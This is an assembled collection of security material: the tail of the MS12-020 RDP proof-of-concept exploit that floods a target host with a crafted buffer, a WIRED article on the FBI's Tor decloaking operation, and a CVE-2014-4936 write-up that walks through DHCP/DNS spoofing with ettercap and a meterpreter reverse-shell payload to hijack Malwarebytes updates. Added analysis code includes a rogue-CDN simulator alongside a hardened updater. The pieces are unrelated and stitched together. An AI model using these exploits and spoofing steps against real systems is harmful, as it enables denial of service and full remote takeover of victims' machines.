buf += b"\x00\x02\x04\x82\x01\x33\x00\x05"
buf += b"\x00\x14\x7c\x00\x01\x81\x2a\x00"
buf += b"\x08\x00\x10\x00\x01\xc0\x00\x44"
buf += b"\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf += b"\x00\x04\x00\x08\x00\x80\x02\xe0"
buf += b"\x01\x01\xca\x03\xaa\x09\x04\x00"
buf += b"\x00\xce\x0e\x00\x00\x48\x00\x4f"
buf += b"\x00\x53\x00\x54\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x04\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x0c\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x01\xca\x01\x00\x00\x00\x00"
buf += b"\x00\x10\x00\x07\x00\x01\x00\x30"
buf += b"\x00\x30\x00\x30\x00\x30\x00\x30"
buf += b"\x00\x2d\x00\x30\x00\x30\x00\x30"
buf += b"\x00\x2d\x00\x30\x00\x30\x00\x30"
buf += b"\x00\x30\x00\x30\x00\x30\x00\x30"
buf += b"\x00\x2d\x00\x30\x00\x30\x00\x30"
buf += b"\x00\x30\x00\x30\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf += b"\x00\x0d\x00\x00\x00\x00\x00\x00"
buf += b"\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x03\xc0\x2c"
buf += b"\x00\x03\x00\x00\x00\x72\x64\x70"
buf += b"\x64\x72\x00\x00\x00\x00\x00\x80"
buf += b"\x80\x63\x6c\x69\x70\x72\x64\x72"
buf += b"\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf += b"\x73\x6e\x64\x00\x00\x00\x00\x00"
buf += b"\xc0"
buf += b"\x03\x00\x00\x0c"  # TPKT, version 3, length 12
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x04\x01\x00\x01\x00"  # MULTIPOINT-COMMUNICATION-SERVICE T.125 (ErectDomainRequest)
buf += b"\x03\x00\x00\x08"  # TPKT, version 3, length 8
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x28"  # MULTIPOINT-COMM-SERVICE T.125 (AttachUserRequest)
buf += b"\x03\x00\x00\x0c"  # TPKT, version 3, length 12
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x38\x00\x06\x03\xef"  # MULTIPOINT-COMM-SERVICE T.125 (ChannelJoinRequest)
buf += b"\x03\x00\x00\x0c"  # TPKT, version 3, length 12
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x38\x00\x06\x03\xeb"  # MULTIPOINT-COMM-SERVICE T.125
buf += b"\x03\x00\x00\x0c"  # TPKT, version 3, length 12
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x38\x00\x06\x03\xec"  # MULTIPOINT-COMM-SERVICE T.125
buf += b"\x03\x00\x00\x0c"  # TPKT, version 3, length 12
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x38\x00\x06\x03\xed"  # MULTIPOINT-COMM-SERVICE T.125
buf += b"\x03\x00\x00\x0c"  # TPKT, version 3, length 12
buf += b"\x02\xf0\x80"  # ITU-T Rec X.224
buf += b"\x38\x00\x06\x03\xee"  # MULTIPOINT-COMM-SERVICE T.125
buf += b"\x03\x00\x00\x0b"  # TPKT, version 3, length 11 (0x0b)
buf += b"\x06\xd0\x00\x00\x12\x34\x00"  # ITU-T Rec X.224

HOST = sys.argv[1]
PORT = 3389

# Send the same connection sequence 1000 times, opening a fresh TCP session each time.
for i in range(1000):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print("sending: %d bytes" % len(buf))
    s.send(buf)
    rec = s.recv(100)
    print("received: %d bytes" % len(rec))
    s.close()
# BlackBap.Org

Source: [C#] # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org i - Pastebin.com
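The comments in the PoC name the layers (TPKT, X.224, T.125 MCS) but nothing on the page checks that the length fields add up or says what each MCS PDU is. The parser below is an added example, not part of the BlackBap.Org PoC: it frames a client-to-server RDP stream into TPKT PDUs, rejects inconsistent length fields, and labels the X.224 TPDU and the MCS domain PDU inside each one. The sample stream is built here from the PoC's own short PDUs (the 470-byte MCS Connect-Initial is left out for brevity); the MCS choice numbers and the 1001 user-id base come from the T.125 PER encoding and are stated here as an assumption rather than something the PoC documents.

```python
import struct

# Constructed sample stream: the short PDUs from the PoC above, in the order it
# sends them. The 470-byte MCS Connect-Initial that follows the X.224 CR in the
# PoC is left out to keep the sample small; split_tpkt() frames it the same way.
SAMPLE_STREAM = (
    b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00"
    b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00"
    b"\x03\x00\x00\x08\x02\xf0\x80\x28"
    b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xef"
    b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xeb"
    b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xec"
    b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xed"
    b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xee"
    b"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"
)

# X.224 TPDU code lives in the high nibble of the byte after the length indicator.
X224_TYPES = {0xE0: "CR", 0xD0: "CC", 0x80: "DR", 0xF0: "DT"}

# T.125 DomainMCSPDU choice index = first byte >> 2 (PER encoding). Assumed
# from the T.125 spec, not from the PoC.
MCS_TYPES = {1: "ErectDomainRequest", 8: "DisconnectProviderUltimatum",
             10: "AttachUserRequest", 14: "ChannelJoinRequest", 25: "SendDataRequest"}
MCS_USER_ID_BASE = 1001  # PER encodes a UserId as (value - 1001)


def split_tpkt(stream):
    """Frame a byte stream into TPKT PDUs as [(declared_len, payload), ...].

    Raises ValueError on a bad version byte, a length below the 4-byte header,
    or a PDU whose declared length runs past the end of the stream.
    """
    pdus, off = [], 0
    while off < len(stream):
        if len(stream) - off < 4:
            raise ValueError("truncated TPKT header at offset %d" % off)
        version, _reserved, length = struct.unpack("!BBH", stream[off:off + 4])
        if version != 3:
            raise ValueError("TPKT version %d at offset %d" % (version, off))
        if length < 4 or off + length > len(stream):
            raise ValueError("TPKT length %d at offset %d is inconsistent" % (length, off))
        pdus.append((length, stream[off + 4:off + length]))
        off += length
    return pdus


def classify(payload):
    """Label one TPKT payload as (x224_type, mcs_type, detail)."""
    if len(payload) < 2:
        return ("short", None, None)
    li, code = payload[0], payload[1] & 0xF0
    x224 = X224_TYPES.get(code, "0x%02x" % code)
    if x224 != "DT":
        return (x224, None, None)          # CR/CC/DR carry no MCS user data here
    mcs = payload[1 + li:]                  # user data starts after the X.224 header
    if mcs[:2] == b"\x7f\x65":              # BER tag of MCS Connect-Initial
        return (x224, "ConnectInitial", None)
    if not mcs:
        return (x224, None, None)
    choice = mcs[0] >> 2
    name = MCS_TYPES.get(choice, "choice %d" % choice)
    detail = None
    if choice == 14 and len(mcs) >= 5:      # ChannelJoinRequest: initiator, channelId
        initiator, channel = struct.unpack("!HH", mcs[1:5])
        detail = {"initiator": initiator + MCS_USER_ID_BASE, "channel": channel}
    return (x224, name, detail)


def summarize(stream):
    """Return one (declared_len, x224_type, mcs_type, detail) tuple per PDU."""
    return [(n,) + classify(p) for n, p in split_tpkt(stream)]


def is_well_framed(stream):
    """True when every TPKT length field is consistent with the stream."""
    try:
        split_tpkt(stream)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for row in summarize(SAMPLE_STREAM):
        print(row)
```

Running it prints one row per PDU; the five ChannelJoinRequests resolve to channels 1007 and 1003 through 1006, the ones the PoC joins before the final X.224 TPDU. A stream whose last TPKT header claims more bytes than remain is rejected rather than silently truncated, which is the check the hand-written length comments in the PoC never get.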
-
The FBI Used the Web’s Favorite Hacking Tool to Unmask Tor Users
By Kevin Poulsen, 12.16.14, 7:00 am

For more than a decade, a powerful app called Metasploit has been the most important tool in the hacking world: An open-source Swiss Army knife of hacks that puts the latest exploits in the hands of anyone who’s interested, from random criminals to the thousands of security professionals who rely on the app to scour client networks for holes. Now Metasploit has a new and surprising fan: the FBI. WIRED has learned that FBI agents relied on Flash code from an abandoned Metasploit side project called the “Decloaking Engine” to stage its first known effort to successfully identify a multitude of suspects hiding behind the Tor anonymity network. That attack, “Operation Torpedo,” was a 2012 sting operation targeting users of three Dark Net child porn sites. Now an attorney for one of the defendants ensnared by the code is challenging the reliability of the hackerware, arguing it may not meet Supreme Court standards for the admission of scientific evidence. “The judge decided that I would be entitled to retain an expert,” says Omaha defense attorney Joseph Gross. “That’s where I am on this—getting a programming expert involved to examine what the government has characterized as a Flash application attack of the Tor network.” A hearing on the matter is set for February 23. Tor, a free, open-source project originally funded by the US Navy, is sophisticated anonymity software that protects users by routing traffic through a labyrinthine delta of encrypted connections. Like any encryption or privacy system, Tor is popular with criminals. But it also is used by human rights workers, activists, journalists and whistleblowers worldwide. Indeed, much of the funding for Tor comes from grants issued by federal agencies like the State Department that have a vested interest in supporting safe, anonymous speech for dissidents living under oppressive regimes.
With so many legitimate users depending upon the system, any successful attack on Tor raises alarm and prompts questions, even when the attacker is a law enforcement agency operating under a court order. Did the FBI develop its own attack code, or outsource it to a contractor? Was the NSA involved? Were any innocent users ensnared? Now, some of those questions have been answered: Metasploit’s role in Operation Torpedo reveals the FBI’s Tor-busting efforts as somewhat improvisational, at least at first, using open-source code available to anyone. Created in 2003 by white hat hacker HD Moore, Metasploit is best known as a sophisticated open-source penetration testing tool that lets users assemble and deliver an attack from component parts—identify a target, pick an exploit, add a payload and let it fly. Supported by a vast community of contributors and researchers, Metasploit established a kind of lingua franca for attack code. When a new vulnerability emerges, like April’s Heartbleed bug, a Metasploit module to exploit it is usually not far behind. Moore believes in transparency—or “full disclosure”—when it comes to security holes and fixes, and he’s applied that ethic in other projects under the Metasploit banner, like the Month of Browser Bugs, which demonstrated 30 browser security holes in as many days, and Critical.IO, Moore’s systematic scan of the entire Internet for vulnerable hosts. That project earned Moore a warning from law enforcement officials, who cautioned that he might be running afoul of federal computer crime law. In 2006, Moore launched the “Metasploit Decloaking Engine,” a proof-of-concept that compiled five tricks for breaking through anonymization systems. If your Tor install was buttoned down, the site would fail to identify you. But if you’d made a mistake, your IP would appear on the screen, proving you weren’t as anonymous as you thought. 
“That was the whole point of Decloak,” says Moore, who is chief research officer at Austin-based Rapid7. “I had been aware of these techniques for years, but they weren’t widely known to others.” One of those tricks was a lean 35-line Flash application. It worked because Adobe’s Flash plug-in can be used to initiate a direct connection over the Internet, bypassing Tor and giving away the user’s true IP address. It was a known issue even in 2006, and the Tor Project cautions users not to install Flash. The decloaking demonstration eventually was rendered obsolete by a nearly idiot-proof version of the Tor client called the Tor Browser Bundle, which made security blunders more difficult. By 2011, Moore says virtually everyone visiting the Metasploit decloaking site was passing the anonymity test, so he retired the service. But when the bureau obtained its Operation Torpedo warrants the following year, it chose Moore’s Flash code as its “network investigative technique”—the FBI’s lingo for a court-approved spyware deployment. Torpedo unfolded when the FBI seized control of a trio of Dark Net child porn sites based in Nebraska. Armed with a special search warrant crafted by Justice Department lawyers in Washington DC, the FBI used the sites to deliver the Flash application to visitors’ browsers, tricking some of them into identifying their real IP address to an FBI server. The operation identified 25 users in the US and an unknown number abroad. Gross learned from prosecutors that the FBI used the Decloaking Engine for the attack — they even provided a link to the code on Archive.org. Compared to other FBI spyware deployments, the Decloaking Engine was pretty mild. In other cases, the FBI has, with court approval, used malware to covertly access a target’s files, location, web history and webcam. But Operation Torpedo is notable in one way. 
It’s the first time—that we know of—that the FBI deployed such code broadly against every visitor to a website, instead of targeting a particular suspect. The tactic is a direct response to the growing popularity of Tor, and in particular an explosion in so-called “hidden services”—special websites, with addresses ending in .onion, that can be reached only over the Tor network. Hidden services are a mainstay of the nefarious activities carried out on the so-called Dark Net, the home of drug markets, child porn, and other criminal activity. But they’re also used by organizations that want to evade surveillance or censorship for legitimate reasons, like human rights groups, journalists, and, as of October, even Facebook. A big problem with hidden services, from a law enforcement perspective, is that when the feds track down and seize the servers, they find that the web server logs are useless to them. With a conventional crime site, those logs typically provide a handy list of Internet IP addresses for everyone using the site – quickly leveraging one bust into a cascade of dozens, or even hundreds. But over Tor, every incoming connection traces back only as far as the nearest Tor node—a dead end. Thus, the mass spyware deployment of Operation Torpedo. The Judicial Conference of the United States is currently considering a Justice Department petition to explicitly permit spyware deployments, based in part on the legal framework established by Operation Torpedo. Critics of the petition argue the Justice Department must explain in greater detail how it’s using spyware, allowing a public debate over the capability. “One thing that’s frustrating for me right now, is it’s impossible to get DOJ to talk about this capability,” says Chris Soghoian, principal technologist at the ACLU.
“People in government are going out of their way to keep this out of the discussion.” For his part, Moore has no objection to the government using every available tool to bust pedophiles–he once publicly proposed a similar tactic himself. But he never expected his long-dead experiment to drag him into a federal case. Last month he started receiving inquiries from Gross’ technical expert, who had questions about the efficacy of the decloaking code. And last week Moore started getting questions directly from the accused pedophile in the case— a Rochester IT worker who claims he was falsely implicated by the software. Moore finds that unlikely, but in the interest of transparency, he answered all the questions in detail. “It only seemed fair to reply to his questions,” Moore says. “Though I don’t believe my answers help his case at all.” Using the outdated Decloaking Engine would not likely have resulted in false identifications, says Moore. In fact, the FBI was lucky to trace anyone using the code. Only suspects using extremely old versions of Tor, or who took great pains to install the Flash plug-in against all advice, would have been vulnerable. By choosing an open-source attack, the FBI essentially selected for the handful of offenders with the worst op-sec, rather than the worst offenders. Since Operation Torpedo, though, there’s evidence the FBI’s anti-Tor capabilities have been rapidly advancing. Torpedo was in November 2012. In late July 2013, computer security experts detected a similar attack through Dark Net websites hosted by a shady ISP called Freedom Hosting—court records have since confirmed it was another FBI operation. For this one, the bureau used custom attack code that exploited a relatively fresh Firefox vulnerability—the hacking equivalent of moving from a bow-and-arrow to a 9-mm pistol. In addition to the IP address, which identifies a household, this code collected the MAC address of the particular computer that was infected by the malware.
“In the course of nine months they went from off the shelf Flash techniques that simply took advantage of the lack of proxy protection, to custom-built browser exploits,” says Soghoian. “That’s a pretty amazing growth … The arms race is going to get really nasty, really fast.”

Source: The FBI Used the Web's Favorite Hacking Tool to Unmask Tor Users | WIRED
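The article explains the trick in one sentence: the page is fetched through Tor, so the server sees an exit node, while the Flash object opens a direct connection that arrives from the user's real address. What turns that into an identification is tying the two connections together. The correlator below is an added example, not Moore's Decloak code and not anything from the FBI operation: it assumes the page served through Tor carries a per-visit token, that the same token is sent on the plugin's direct connection, and that both are logged with the source address the server saw. Tokens whose two addresses differ are the decloaked visits. The log lines are constructed and use documentation address ranges.

```python
import re
from collections import defaultdict

# Constructed sample log (not real Decloak or FBI data). Two channels share a
# per-visit token: "web" is the HTTP request that arrived through Tor, "direct"
# is the TCP connection the Flash object opened outside the proxy.
SAMPLE_LOG = """\
2012-11-19T10:01:02Z web token=a1f3 src=198.51.100.17 ua="Mozilla/5.0"
2012-11-19T10:01:03Z direct token=a1f3 src=203.0.113.42
2012-11-19T10:02:10Z web token=b77e src=198.51.100.23 ua="Mozilla/5.0"
2012-11-19T10:02:11Z direct token=b77e src=198.51.100.23
2012-11-19T10:03:40Z web token=c09d src=192.0.2.9 ua="Mozilla/5.0"
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<chan>web|direct) token=(?P<token>\w+) src=(?P<ip>[\d.]+)")


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def correlate(events):
    """Group events by token and decide what each visit revealed.

    Returns {token: verdict} where verdict is one of
      ("decloaked", exit_ip, real_ip)  direct connection came from another address
      ("same_ip", ip)                  plugin connected, but from the same address
                                       (proxy-aware client, or no proxy in use)
      ("no_direct", exit_ip)           nothing bypassed the proxy
    Only the first address seen per (token, channel) is used.
    """
    by_token = defaultdict(dict)
    for ev in events:
        by_token[ev["token"]].setdefault(ev["chan"], ev["ip"])
    verdicts = {}
    for token, chans in by_token.items():
        web, direct = chans.get("web"), chans.get("direct")
        if web is None:
            continue                     # a direct hit with no page view: ignore
        if direct is None:
            verdicts[token] = ("no_direct", web)
        elif direct != web:
            verdicts[token] = ("decloaked", web, direct)
        else:
            verdicts[token] = ("same_ip", web)
    return verdicts


if __name__ == "__main__":
    for token, verdict in sorted(correlate(parse_log(SAMPLE_LOG)).items()):
        print(token, verdict)
```

The "same_ip" case is what the Tor Browser Bundle produces when the plugin is absent or proxied, and is the reason Moore says the service had become useless by 2011: the second connection either never happens or carries nothing new.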
-
There is also Cyborg Hawk. Both are made by Indians. Pieces of junk. Don't use such things.
-
Manual Web Application Penetration Testing – Suffix & Prefix in Fuzzing
Nytro replied to a topic in Securitate web
Just a fancy title for SQLi login bypass...
CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking In June of this year I was playing around with Malwarebytes’s products. I blogged about one of their products, Malwarebytes Anti-Malware, before when it had some issues; you can read that blog entry [ here ]. While playing around with Anti-Malware I discovered you could easily hijack the upgrade mechanism. After figuring out the protocol I could push my own upgrades. I reported this to Malwarebytes on July 16th, it got a CVE assigned: CVE-2014-4936. About half a month later, around the time Malwarebytes had released their Anti-Exploit product Beta I started to play around with this one as well. I discovered it was subject to the same upgrade hijacking method. Both vulnerabilities were scaled under one CVE, it was a shared mechanism (and code). Officially the description for this CVE has become: Malwarebytes Anti-Malware in consumer version 2.0.2 and earlier and Malwarebytes Anti-Exploit in consumer version 1.03 and earlier allow attackers to execute arbitrary code by hijacking the underlying network layer or DNS infrastructure between the client PC and the Malwarebytes Content Delivery Network (CDN). Corporate versions are not affected. One thing to note is that consumer versions of MBAM and MBAE are affected by this. Business versions of the products do not use the Malwarebytes CDN for upgrades. This blog entry describes the vulnerability, how it works and how you can perform the attack including a POC. 
Code for the POC is hosted on my Github repository: [ CVE-2014-4936 POC ]

Timeline:

Malwarebytes Anti-Malware
Vulnerability discovered: June 18th 2014
Vulnerability reported: July 16th 2014
Vulnerability fixed in version 2.0.3, released on October 3rd 2014

Malwarebytes Anti-Exploit
Vulnerability discovered: August 19th 2014
Vulnerability reported: August 21st 2014
Vulnerability fixed in version 1.04.1.1012, released on September 5th 2014

The vulnerability

Both Anti-Malware and Anti-Exploit have upgrade capabilities in the form of HTTP-transferred installation packages. Both software packages have no or limited upgrade validation implemented, thus allowing anyone who can work out the upgrade protocol to inject their own payload.

Updates and Upgrades

When the software, either MBAM or MBAE, starts it will first resolve the Malwarebytes CDN:

192.168.2.102 -> 8.8.8.8 (DNS) Standard query A data-cdn.mbamupdates.com

For MBAM it will start checking versions of the following:
Consumer config
Consumer news
Consumer versioncheck
Consumer HTML
Signature database
Program upgrades

If any of the version requests respond with a higher number than the client itself has, it will start downloading a partial or full update/upgrade. For the program upgrade it will download an installer for the latest version. We are interested in the program upgrade as we can use this to, with ease, send malicious payloads without having to go into any advanced exploitation techniques. The client will start by sending a version request. In the version request the User-Agent of the client shows the version (red underlined in the top section); the client has version 1.60.1.1000. The server responds by telling the client version 1.75.0.1300 (red underlined in the bottom section) is the latest available. The client will then proceed by downloading this file by making a request to the CDN once more. The installation is downloaded and the installer for the new version starts.
The problem here lies with the fact that the MBAM client does not verify the actual installer it downloads. It can be whatever arbitrary Windows PE the server gives back. This is combined with the fact that MBAM starts the new client installer with full administrative privileges. A similar implementation and the same problem occur for MBAE as well: payloads are unchecked and executed with full administrative privileges with Malwarebytes’s protection uninstalled. This process is the same for MBAE although the request is a little bit different. MBAM makes the following two requests for the version check followed by the upgrade download:

GET http://data-cdn.mbamupdates.com/v0/program/mbam.check.program HTTP/1.1
GET http://data-cdn.mbamupdates.com/v0/program/data/mbam-setup-<new version>.exe HTTP/1.1

MBAE makes the following requests:

GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/version.chk HTTP/1.1
GET http://data-cdn.mbamupdates.com/v2/mbae/consumer/data/mbae-setup-<new version>.exe

Hijacking the upgrades, exploiting the vulnerability

I have the following setup: two VMs in host-only network adapter mode:
Windows XP running an old MBAM version 1.60.1.1000
Kali Linux running my MBAM CDN simulation python script

To exploit the client and to prove the vulnerability we need to intercept the DNS requests for data-cdn.mbamupdates.com. We have a few options:
Change the DNS adapter settings to resolve DNS with my Kali system, which can do redirection
Use the Windows hosts file to override DNS
Grab ettercap in Kali and spoof towards the client to get DNS redirected

To show the POC in a more ‘natural’ environment I chose the 3rd option. I’m going to show the vulnerability by performing a DHCP spoofing attack. There are of course other methods of attacking; you just need to be able to control the DNS of the client. Let’s start: first we set up both clients running side by side, with the two VMs in host-only adapter mode.
On the Windows XP machine we install the old MBAM version; I took the oldest MBAM installer I had, version 1.60.1.1000. On Kali we also have to start the Malwarebytes CDN simulator; you can get this script from the Github repository [ here ]. The simulator doesn’t need any arguments, you can just run it by typing:

python Malwarebytes-CDN-Simulator-CVE-2014-4936.py

Some older versions of MBAM (1.46 for example) follow an older upgrade pattern; although the vulnerability also exists for these versions, the provided Malwarebytes CDN simulator only works for MBAM since version 1.60.1.xxx. Older versions will crash during the upgrade. You could adapt the POC to work for these versions as well; it’s a matter of changing the URLs it looks at. One thing you have to make sure of is that you put your payload in the working directory of the CDN simulator and name it ‘payload.exe’ in order for it to be picked up and sent to the upgrading clients. For this attack we’ll generate a meterpreter payload; we’re running Kali, which has Metasploit installed already. We can quickly generate a PE payload from the command line; in this example I use the meterpreter payload:

msfcli multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=4444 E

Note: Rapid7 published a post regarding the deprecation of msfpayload. This means in the future this payload has to be generated slightly differently. Read more on the change here: [ Good-bye msfpayload and msfencode ]

The handler will start and listen for incoming connections. Our reverse handler is now ready to receive incoming connections from our meterpreter payload; we can now start our attack. The next thing we need to do is get DNS requests from the Windows XP machine redirected towards the Kali machine so they can be intercepted. We do this by grabbing Ettercap; in my case I grab Ettercap Graphical so I can visually show the attack in steps here.
Let’s open up Ettercap and start by setting it in unified sniffing mode. The difference from bridged mode is that in unified mode we just sniff all packets that pass on the interface; in bridged mode it will use two network interfaces and forward traffic from one to the other and perform a mitm attack. In our case we will do a DNS ‘mitm’ attack but we don’t need bridged mode. After opening up unified mode the menu will change. Now it’s time to select our target: from the Hosts menu open up the host list and then hit Scan for hosts. A list of hosts in the currently connected network will appear; in my case there are two:
The Windows XP machine (192.168.56.102)
The host running the virtual machines (192.168.56.1)

We select the target, the Windows XP machine with IP 192.168.56.102, and hit the ‘Add to Target 1’ button to select it. You can view the targets by clicking the Current Targets button under the Targets menu option to see if the machine was selected. Now we have to enable the DNS spoofing. Ettercap does have a plugin called ‘dns_spoof’ but I chose to use dnslib’s intercept server. It’s part of the DNSLib python library. Setting it up is a single command:

python -m dnslib.intercept -p 53 -a 192.168.56.103 -i '* IN A 192.168.56.103'

Here we set up our listener on port 53, bind to address 192.168.56.103, intercept any request (* for the wildcard) and respond to it with the 192.168.56.103 IP. This means we will grab any request; you can also specify it a bit better by only responding for data-cdn.mbamupdates.com and *.data-cdn.mbamupdates.com, but for ease I chose to intercept everything and route it to the Kali machine. We can now start our attack. Open up the Mitm menu option and click on Dhcp spoofing. We will spoof DHCP towards the Windows XP client so we can force our own DNS server into the DNS server settings.
On the DHCP Spoofing popup we leave the IP Pool field empty, enter 255.255.255.0 in the Netmask field and put our own IP (192.168.56.103) in the DNS Server IP field to force the Kali host to be the DNS server for the Windows XP machine. After entering the options hit the ‘OK’ button to start the attack. In the status log we can see Ettercap is starting the attack. After we’ve started the DHCP spoofing we need to wait for the DHCP lease to renew (or force it on the client itself) so Ettercap can spoof it. After a bit Ettercap will log the DHCP request and its response to it:

DHCP: [08:00:27:2F:56:97] REQUEST 192.168.56.102
DHCP spoofing: fake ACK [08:00:27:2F:56:97] assigned to 192.168.56.102
DHCP: [192.168.56.103] ACK : 192.168.56.102 255.255.255.0 GW 192.168.56.103 DNS 192.168.56.103

On the client we can now check the ipconfig settings for our spoofed DNS server. What we have to do now is either wait for the MBAM client on the Windows machine to contact the server for upgrades automatically or force it by hitting the Check for Updates button on the Update tab in the MBAM GUI. On the Malwarebytes CDN script terminal we can see the client contacted us and has downloaded the payload:

root@kali:~/mbam_upgrade# python Malwarebytes-CDN-Simulator-CVE-2014-4936.py
Started Malwarebytes CDN simulator.
[+] Attempt for URI: /v1/news/consumer/version.chk
192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/news/consumer/version.chk HTTP/1.1" 200 -
[+] Attempt for URI: /v1/custom/consumer/version.chk
192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/custom/consumer/version.chk HTTP/1.1" 200 -
[+] Attempt for URI: /v1/database/rules/version.chk
192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v1/database/rules/version.chk HTTP/1.1" 200 -
192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/mbam.check.program HTTP/1.1" 200 -
[+] MBAM Client program version check: Client version 1.60.1.1000, enforced update version 2.60.1.1000
192.168.56.102 - - [07/Oct/2014 15:43:49] "GET /v0/program/data/mbam-setup-2.60.1.1000.exe HTTP/1.1" 200 -
[+] MBAM Client payload download.

On the Windows machine we see MBAM telling us a new version is available. If we accept and run the upgrade installer we see MBAM disappear and nothing happens. Now if you check back with the meterpreter handler we see the client has connected back to us. And due to how the upgrade works, the old MBAM install will execute the ‘installer’ with full administrative privileges, as you can see by typing getuid. We have successfully injected our payload into the upgrade process of MBAM. We have taken over the Windows XP machine by abusing the vulnerability. The same process can be used to take over MBAE clients; the only difference is the check-in URLs, but the Malwarebytes CDN simulator script already takes care of it. Enjoy!

Source: 0x3a - Security Specialist and programmer by trade - CVE-2014-4936: Malwarebytes Anti-Malware and Anti-Exploit upgrade hijacking
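The post shows the two requests the client makes and the simulator's log, but not the client-side logic that makes the attack work, nor what a fixed client would have to do. The example below is added here and is not the post's CDN simulator or Malwarebytes code. `rogue_cdn` answers the real check and download paths the way the post describes the simulator doing; `vulnerable_upgrade` models the client behaviour the post documents (trust the advertised version, download, hand the bytes to an installer running as administrator); `hardened_upgrade` shows the shape of a fix, a signed manifest binding version to installer digest that is verified before anything runs. The manifest path and format are hypothetical, and the HMAC tag stands in for the public-key signature a shipping product would verify against a key pinned in the binary, so the example runs offline.

```python
import hashlib
import hmac
import re

# --- rogue CDN, as the post describes the simulator: any version check is
# answered with a higher version and any installer download returns payload.exe.
FORCED_VERSION = "2.60.1.1000"
PAYLOAD = b"MZ\x90\x00constructed stand-in for payload.exe"   # constructed, not a real PE

CHECK_PATHS = ("/v0/program/mbam.check.program", "/v2/mbae/consumer/version.chk")
SETUP_RE = re.compile(r"^/v(?:0/program|2/mbae/consumer)/data/mba[me]-setup-([\d.]+)\.exe$")


def rogue_cdn(path):
    """Return (status, body) the way the hijacked data-cdn host would."""
    if path in CHECK_PATHS:
        return 200, FORCED_VERSION.encode()
    if SETUP_RE.match(path):
        return 200, PAYLOAD
    return 404, b""


def parse_version(text):
    return tuple(int(x) for x in text.strip().split("."))


# --- the client behaviour the post documents: no integrity check at all -------
def vulnerable_upgrade(current, fetch):
    status, body = fetch(CHECK_PATHS[0])
    if status != 200:
        return ("up_to_date",)
    latest = body.decode().strip()
    if parse_version(latest) <= parse_version(current):
        return ("up_to_date",)
    status, installer = fetch("/v0/program/data/mbam-setup-%s.exe" % latest)
    return ("execute_as_admin", installer)         # whatever came back gets run


# --- hardened client. Hypothetical manifest endpoint/format; the HMAC tag is a
# stand-in for a public-key signature checked against a pinned key. -----------
DEMO_KEY = b"constructed-demo-key"                 # would be a pinned public key
MANIFEST_PATH = "/v0/program/manifest.txt"          # hypothetical
MANIFEST_RE = re.compile(r"^version=([\d.]+) sha256=([0-9a-f]{64}) sig=([0-9a-f]{64})$")


def sign_manifest(version, installer):
    """Publisher side: bind the version to the installer digest and sign it."""
    digest = hashlib.sha256(installer).hexdigest()
    body = "version=%s sha256=%s" % (version, digest)
    tag = hmac.new(DEMO_KEY, body.encode(), hashlib.sha256).hexdigest()
    return "%s sig=%s" % (body, tag)


def hardened_upgrade(current, fetch):
    status, body = fetch(MANIFEST_PATH)
    if status != 200:
        return ("reject", "no manifest")
    m = MANIFEST_RE.match(body.decode(errors="replace").strip())
    if not m:
        return ("reject", "malformed manifest")
    version, digest, sig = m.groups()
    signed = "version=%s sha256=%s" % (version, digest)
    expected = hmac.new(DEMO_KEY, signed.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return ("reject", "bad manifest signature")   # a rogue CDN fails here
    if parse_version(version) <= parse_version(current):
        return ("up_to_date",)
    status, installer = fetch("/v0/program/data/mbam-setup-%s.exe" % version)
    if status != 200 or hashlib.sha256(installer).hexdigest() != digest:
        return ("reject", "installer digest mismatch")  # swapped installer fails here
    return ("execute_as_admin", installer)


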